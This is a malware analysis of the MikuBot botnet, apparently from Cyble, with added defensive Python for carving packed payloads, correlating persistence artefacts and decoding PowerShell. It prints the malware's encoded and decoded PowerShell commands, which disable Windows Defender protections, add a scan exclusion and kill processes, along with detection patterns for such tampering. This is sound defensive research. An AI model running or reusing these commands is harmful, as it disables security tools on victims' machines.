New Botnet Spies on Victims Using Hidden VNC
During a routine threat-hunting exercise, Cyble Research Labs came across a new malware bot named “MikuBot” in a cyber-crime forum. MikuBot is a malicious bot that steals sensitive data, launches hidden VNC sessions that allow the TA (Threat Actor) to access the victim’s machine remotely, spreads through USB, and downloads and executes other malware.
The bot is written in C++ and works on operating systems ranging from Windows Vista to Windows 11. According to the TA’s post, the malware is standalone and does not require any dependencies to run. Additionally, the TA provides full software support, consultation, new features, crypts, and responsive administration for MikuBot.
The TA has also mentioned in the post that the malware uses encrypted strings, dynamic API functions, unique object names, anti-emulation methods, and tricks to evade detection by antivirus products.
The figure below shows the TA’s MikuBot advertisement on a cybercrime forum with price and feature details.
The TA sells MikuBot together with its panel at the following prices, which the post describes as temporary:
- $1,300 (1.5 months)
- $2,200 (3 months)
In the same post, the TA claims that the bot and panel have the following features.
We took the following sample hash for our analysis:
The sample is a 32-bit executable compiled with the Microsoft Visual C/C++ compiler.
The dropper carries an encrypted payload embedded as an RCData entry in its resource section. On execution, it loads the encrypted payload from the resource section and decrypts it.
The figure below shows the UPX-packed payload decrypted from the RCData resource.
The malware then loads the UPX-packed payload and executes it in memory, as shown below.
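As an added example, not code from the Cyble write-up or from the malware, the following Python parses the headers of whatever comes out of the resource decryption and reports any embedded PE image whose section table carries the UPX0/UPX1 names. That is the quickest way to confirm that the decrypted RCData blob is the UPX-packed stage before handing it to `upx -d`. The test image is constructed inside the script (the decryption routine itself is not reproduced here), and only header fields are read; nothing is mapped or executed.

```python
import struct

DOS_MAGIC = b"MZ"
NT_MAGIC = b"PE\0\0"
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}   # section names UPX gives the packed data and stub


def section_names(blob, mz_off):
    """Return the section names of the PE image whose DOS header starts at blob[mz_off],
    or None if the headers at that offset are not a well-formed PE."""
    if blob[mz_off:mz_off + 2] != DOS_MAGIC or len(blob) < mz_off + 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", blob, mz_off + 0x3C)[0]
    nt = mz_off + e_lfanew
    if nt + 24 > len(blob) or blob[nt:nt + 4] != NT_MAGIC:
        return None
    # IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4) PointerToSymbolTable(4)
    # NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    num_sections = struct.unpack_from("<H", blob, nt + 6)[0]
    opt_size = struct.unpack_from("<H", blob, nt + 20)[0]
    table = nt + 24 + opt_size                      # section table follows the optional header
    if table + 40 * num_sections > len(blob):
        return None
    return [blob[table + 40 * i:table + 40 * i + 8].rstrip(b"\0") for i in range(num_sections)]


def carve_pe_images(blob):
    """Find every PE image embedded in blob (e.g. a decrypted RCData resource) and flag
    the ones whose section names say they are UPX-packed."""
    hits, pos = [], blob.find(DOS_MAGIC)
    while pos != -1:
        names = section_names(blob, pos)
        if names is not None:
            hits.append({"offset": pos, "sections": names,
                         "upx": any(n in UPX_SECTION_NAMES for n in names)})
        pos = blob.find(DOS_MAGIC, pos + 1)
    return hits


def build_constructed_upx_pe():
    """Constructed test input, not bytes from the real sample: a minimal PE32 header whose
    section table carries UPX0/UPX1/.rsrc, the shape the dropped payload has."""
    dos = bytearray(0x40)
    dos[0:2] = DOS_MAGIC
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew: NT headers right after the DOS header
    opt_size = 0xE0                                    # PE32 optional header size
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, opt_size, 0x0102)  # i386, 3 sections
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    sections = b"".join(name.ljust(8, b"\0") + bytes(32) for name in (b"UPX0", b"UPX1", b".rsrc"))
    return bytes(dos) + NT_MAGIC + file_hdr + bytes(opt) + sections


if __name__ == "__main__":
    # Wrap the constructed image in padding plus a decoy "MZ" that is not a PE header.
    resource = bytes(37) + build_constructed_upx_pe() + b"MZ-not-a-header"
    for hit in carve_pe_images(resource):
        print(hit)   # offset 37, sections [b'UPX0', b'UPX1', b'.rsrc'], upx True
```

A stray "MZ" inside the decrypted buffer is common (the decrypted data often contains the dropper's own strings), so the carver validates the full path from e_lfanew to the section table before reporting an image rather than trusting the two-byte magic.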
Once unpacked in memory, the payload creates a mutex named “CBB536F139732610633691” so that only one instance of the malware runs on the victim’s system at a time.
Next, it creates a folder named after the mutex under %appdata%, copies itself into that folder under the same name, and marks both as hidden, as shown below.
It then registers a scheduled task, also named after the mutex, that executes the malware every 10 minutes.
Additionally, it drops an Internet shortcut (.url) file in the Startup folder so that the malware is launched again after a reboot.
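The artefacts above (a mutex-named folder and self-copy under %appdata%, a 10-minute scheduled task, a .url in the Startup folder) chain together well for detection. The following Python is an added example, not Cyble's tooling or the malware's code, that runs that logic over constructed Sysmon-style file-create (event 11) and Security scheduled-task-created (event 4698) records. It assumes the mutex-derived name is an upper-case hex string like the sample's, and that the task XML carries the ISO 8601 repetition interval `PT10M`, which is how Task Scheduler serialises a 10-minute repeat.

```python
import re

# Assumption: the mutex-derived name is an upper-case hex string, as in the sample's CBB536F139732610633691.
MARKER = r"[0-9A-F]{16,}"
SELF_COPY_RE = re.compile(r"\\AppData\\Roaming\\(" + MARKER + r")\\\1\.exe$")        # %appdata%\<name>\<name>.exe
STARTUP_URL_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.url$", re.I)  # .url dropped in Startup
TASK_NAME_RE = re.compile(r"^\\?(" + MARKER + r")$")
INTERVAL_RE = re.compile(r"<Interval>PT(\d+)M</Interval>")                             # ISO 8601 repetition interval
COMMAND_RE = re.compile(r"<Command>([^<]+)</Command>")
APPDATA_RE = re.compile(r"\\AppData\\Roaming\\", re.I)


def check_event(ev):
    """Match one event against the three persistence artefacts; return (rule, marker) or None."""
    if ev["event_id"] == 11:                                   # Sysmon: file created
        target = ev.get("TargetFilename", "")
        m = SELF_COPY_RE.search(target)
        if m:
            return "self_copy_under_appdata", m.group(1)
        if STARTUP_URL_RE.search(target):
            return "startup_url_shortcut", None
    elif ev["event_id"] == 4698:                               # Security: scheduled task created
        xml = ev.get("TaskContent", "")
        interval, cmd = INTERVAL_RE.search(xml), COMMAND_RE.search(xml)
        if interval and interval.group(1) == "10" and cmd and APPDATA_RE.search(cmd.group(1)):
            name = TASK_NAME_RE.match(ev.get("TaskName", ""))
            return "ten_minute_task_from_appdata", name.group(1) if name else None
    return None


def triage(events):
    """Group matches per host. Two or more distinct artefacts that agree on a single marker is the
    full MikuBot persistence chain; a lone hit stays low so one stray .url does not page anyone."""
    per_host = {}
    for ev in events:
        hit = check_event(ev)
        if hit is None:
            continue
        rule, marker = hit
        entry = per_host.setdefault(ev["host"], {"rules": set(), "markers": set()})
        entry["rules"].add(rule)
        if marker:
            entry["markers"].add(marker)
    for entry in per_host.values():
        entry["severity"] = "high" if len(entry["rules"]) >= 2 and len(entry["markers"]) == 1 else "low"
    return per_host


# Constructed events (not real telemetry), shaped like Sysmon event 11 and Security event 4698 records.
SAMPLE_EVENTS = [
    {"host": "ws01", "event_id": 11, "Image": r"C:\Users\bob\Downloads\invoice.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\CBB536F139732610633691\CBB536F139732610633691.exe"},
    {"host": "ws01", "event_id": 4698, "TaskName": r"\CBB536F139732610633691",
     "TaskContent": r"<Task><Triggers><TimeTrigger><Repetition><Interval>PT10M</Interval></Repetition>"
                    r"</TimeTrigger></Triggers><Actions><Exec><Command>C:\Users\bob\AppData\Roaming"
                    r"\CBB536F139732610633691\CBB536F139732610633691.exe</Command></Exec></Actions></Task>"},
    {"host": "ws01", "event_id": 11,
     "Image": r"C:\Users\bob\AppData\Roaming\CBB536F139732610633691\CBB536F139732610633691.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.url"},
    {"host": "ws02", "event_id": 11, "Image": r"C:\Program Files\Vendor\updater.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Vendor\cache.dat"},          # benign
    {"host": "ws03", "event_id": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\carol\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\docs.url"},
]

if __name__ == "__main__":
    for host, result in triage(SAMPLE_EVENTS).items():
        print(host, result["severity"], sorted(result["rules"]), sorted(result["markers"]))
```

The correlation step is the point: a .url in Startup or an executable under %appdata% is noisy on its own, but the same hex name appearing as folder, file, and task name on one host is not something legitimate software does.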
When the self-copy runs, it launches two PowerShell instances via the ShellExecuteW() API with the following Base64-encoded commands (the -enc argument is Base64 of the script as UTF-16LE text):
- powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQBuAGEAYgBsAGUAQwBvAG4AdAByAG8AbABsAGUAZABGAG8AbABkAGUAcgBBAGMAYwBlAHMAcwAgAEQAaQBzAGEAYgBsAGUAZAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAGQAaQBzAGEAYgBsAGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwAiAA==
- powershell -Enc KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0AZgBpAGwAdABlAHIAIAAiAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAGwAaQBrAGUAIAAnACUAZABvAG4AYQB0AGUALQBsAGUAdgBlAGwAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQAKACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAGYAaQBsAHQAZQByACAAIgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIABsAGkAawBlACAAJwAlAGMAdQBkAGEAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQA=
The first PowerShell instance runs the following commands, which disable Windows Defender’s controlled folder access and potentially unwanted application (PUA) protection and add the user’s %appdata% (Roaming) folder, where the hidden self-copy lives, to Defender’s exclusion list so that it is never scanned:
- Set-MpPreference -EnableControlledFolderAccess Disabled
- Set-MpPreference -PUAProtection disable
- Add-MpPreference -ExclusionPath "$env:userprofile\AppData\Roaming"
The second PowerShell instance runs the WMI queries below, which terminate competing miners and bots by looking for strings such as “donate-level” (an XMRig command-line option) and “cuda” in the command lines of running processes:
- (Get-WmiObject Win32_Process -filter "CommandLine like '%donate-level%'").Terminate()
- (Get-WmiObject Win32_Process -filter "CommandLine like '%cuda%'").Terminate()
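To decode such command lines in bulk and flag the Defender tampering and process killing they carry, the following Python is an added example (not from the original analysis) that takes the two command lines exactly as printed above, recovers the script from the -enc argument (Base64 of UTF-16LE text, with PowerShell's prefix matching of -EncodedCommand handled), and matches it against a small signature set. The signature names, and the extra Set-MpPreference switches listed alongside the ones this sample uses, are my additions.

```python
import base64
import re

# The two command lines reported in the analysis above, copied verbatim.
MIKUBOT_CMDLINES = [
    "powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQBuAGEAYgBsAGUAQwBvAG4AdAByAG8AbABsAGUAZABGAG8AbABkAGUAcgBBAGMAYwBlAHMAcwAgAEQAaQBzAGEAYgBsAGUAZAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAGQAaQBzAGEAYgBsAGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwAiAA==",
    "powershell -Enc KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0AZgBpAGwAdABlAHIAIAAiAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAGwAaQBrAGUAIAAnACUAZABvAG4AYQB0AGUALQBsAGUAdgBlAGwAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQAKACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAGYAaQBsAHQAZQByACAAIgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIABsAGkAawBlACAAJwAlAGMAdQBkAGEAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQA=",
]

# What a triage rule should flag inside a decoded script. The first two cover the cmdlets this
# sample uses plus neighbouring Set-MpPreference switches (my additions) that are abused the same way.
SIGNATURES = {
    "defender_feature_disabled": re.compile(
        r"(?i)\bSet-MpPreference\b[^\r\n]*-(EnableControlledFolderAccess|PUAProtection|"
        r"DisableRealtimeMonitoring|DisableBehaviorMonitoring|DisableIOAVProtection)\b"),
    "defender_exclusion_added": re.compile(r"(?i)\bAdd-MpPreference\b[^\r\n]*-Exclusion(Path|Process|Extension)\b"),
    "wmi_process_kill": re.compile(r"(?i)\bWin32_Process\b[^\r\n]*\.Terminate\(\)"),
}


def extract_encoded_command(cmdline):
    """Return the base64 argument of -EncodedCommand, honouring PowerShell's prefix matching
    (-e, -en, -enc, ... and the -ec alias all work), or None when the command line has none."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        flag = tok[1:].lower()
        if flag == "ec" or (flag.startswith("e") and "encodedcommand".startswith(flag)):
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64):
    """-EncodedCommand carries the script as UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def triage_command_line(cmdline):
    """Decode the encoded payload, if any, and list the signatures it trips."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return {"script": None, "hits": []}
    script = decode_encoded_command(b64)
    return {"script": script, "hits": [name for name, rx in SIGNATURES.items() if rx.search(script)]}


if __name__ == "__main__":
    for cmdline in MIKUBOT_CMDLINES:
        result = triage_command_line(cmdline)
        print(result["hits"])
        print(result["script"])
```

Decoding with UTF-8 instead of UTF-16LE is the usual mistake here; the result is the script interleaved with NUL bytes, which string-based rules then fail to match.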
The malware then checks for a virtual environment, a debugger, and antivirus tools by looking for characteristic strings and loaded DLL modules.
Finally, the malware collects the victim’s sensitive information and sends it to the C&C server using the URL below:
The below figure shows the code snippet used by the malware for sending the stolen information to its C&C server.
The bot can also spread via USB, download and execute other malware, launch a Hidden Virtual Network Computing (HVNC) session that the TA advertises as working through NAT, and update or remove itself from the victim’s machine.
C&C Panel: MIKUBOT
Here are some screenshots that showcase the control panel of MikuBot.
The login page of MikuBot is shown below.
The figure below shows the home page of the MikuBot panel, which summarises each bot’s status, operating system and region.
The Bots menu lists the bots connected to the C&C server with details such as status, UID, IP, country, Windows version, and first/last seen dates, as shown below.
The figure below shows the Tasks menu, where the TA can create a new HVNC task by specifying a Bot ID, country code, and IP.
The settings panel shown below lets the TA change the login and database credentials, modify the timeout, and so on.
Many cybercriminals purchase malware and add-on services from underground forums to carry out financial fraud without requiring a specific skill set. The sale of malware bots and services has placed individuals and entities at a greater risk of cyber-attacks and financial fraud.
The TAs behind MikuBot are highly active, although the bot’s functionality is limited at the moment. They are, however, evolving their methods, and we can expect more sophisticated variants of MikuBot in the future. Cyble Research Labs will continue to monitor MikuBot developments and keep our readers aware and informed.
- Avoid downloading files from untrusted sources.
- Clear browsing history and reset passwords at regular intervals.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices.
- Use a reputed anti-virus and internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.
- Educate employees on protecting themselves from threats such as phishing and untrusted URLs.
- Block URLs that could be used to spread the malware, e.g., torrent/warez sites.
- Monitor beaconing at the network level to detect and block data exfiltration by malware or TAs.
- Alert on PowerShell launched with an encoded command that calls Set-MpPreference or Add-MpPreference, on new Defender exclusions covering %appdata%, and on scheduled tasks or Startup-folder shortcuts that launch an executable from a hidden folder under %appdata%; these are the artefacts MikuBot leaves behind.
- Enable a Data Loss Prevention (DLP) solution on employees’ systems.
MITRE ATT&CK® Techniques
|Tactic|Technique ID|Technique Name|
|---|---|---|
|Execution|T1204|User Execution|
|Execution|T1059|Command and Scripting Interpreter|
|Defense Evasion|T1497|Virtualization/Sandbox Evasion|
|Defense Evasion|T1562.001|Impair Defenses: Disable or Modify Tools|
|Persistence|T1053|Scheduled Task/Job|
|Persistence|T1547.001|Registry Run Keys / Startup Folder|
|Discovery|T1082|System Information Discovery|
|Collection|T1005|Data from Local System|
|Command and Control|T1071|Application Layer Protocol|
Indicators of Compromise (IOCs)
|MikuBot UPX packed exe|